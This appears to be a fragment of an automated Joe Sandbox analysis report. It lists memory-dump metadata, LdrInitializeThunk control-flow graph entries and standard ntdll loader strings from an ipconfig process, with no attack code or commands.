                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 124 3262d10-3262d1c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 121 3262c30-3262c3c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 122 3262c50-3262c5c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 123 3262cf0-3262cfc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 111 3262b2a-3262b2f 112 3262b31-3262b38 111->112 113 3262b3f-3262b46 LdrInitializeThunk 111->113
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19059469940.0000000002720000.00000040.80000000.00040000.00000000.sdmp, Offset: 02720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_2720000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061858287.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_30e0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Strings
                                                                                    • ExecuteOptions, xrefs: 032944AB
                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03294507
                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03294460
                                                                                    • Execute=1, xrefs: 0329451E
                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0329454D
                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 03294592
                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03294530
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                    • API String ID: 0-484625025
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $$@
                                                                                    • API String ID: 0-1194432280